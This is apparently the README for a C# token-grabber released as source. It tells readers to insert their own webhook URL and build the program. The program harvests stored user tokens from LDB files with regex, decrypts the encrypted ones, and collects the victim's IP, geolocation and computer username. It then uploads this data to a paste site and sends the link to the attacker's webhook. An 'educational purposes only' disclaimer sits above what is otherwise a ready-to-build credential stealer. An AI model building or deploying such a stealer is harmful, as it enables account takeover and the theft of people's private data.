This is made for educational purposes only! Don't use it towards anybody!
Credits to Umbra999 for the decryption algorithm.
Download the source from the Release section, open the solution and head over to the Engine.cs class.
Change following line
private string WebHook { get; } = String.Empty;
To look like this
private string WebHook { get; } = "Your_webhook_link_goes_here";
After setting up the webhook, change the build configuration to release and build the project, that's all!
The program grabs the following:
- User tokens
- Normal tokens
- Encrypted tokens
- Encrypted tokens are being decrypted
- Geolocation
- Continent
- Continent code
- Country
- Country code
- Country capital
- Time zone
- Region
- IP
- Computer username
- Time, indicating when the paste has been uploaded
This is our main class, used to call the necessary functions in order to extract, decrypt and send user tokens.
We declare a public delegate called FunctionInvoke() used to store our functions.
We declare our Regex patterns, Lists and Dictionaries and initialize them by giving them value in the function Run()
All private functions are being added to a List<T> of type FunctionInvoker.
We loop through the FunctionInvoker List using List<T>.ForEach(Action<T>) and each function is getting invoked one by one.
We loop through the Dictionary containing the path information, getting the LDB file and looking for Regex match. If there's one, we add the found token to the corresponding token list.
We decrypt all encrypted tokens and adding them to a separate list.
We upload all acquired user information to the paste and finally send it to the webhook.
This is the class that gets the geolocation of the user.
We declare our properties to store the information.
We get all information by making a request to an external site which returns data in JSON format. The returned data is being deserialized using Json.NET - Newtonsoft and values are being assigned to the properties.
This is the class that uploads the paste.
We create GET/POST to the external site.
We use Regex pattern to search for the paste link that will be sent to the webhook.
The class name speaks for itself.
This is the class where we create instance to Engine.cs so we can call functions.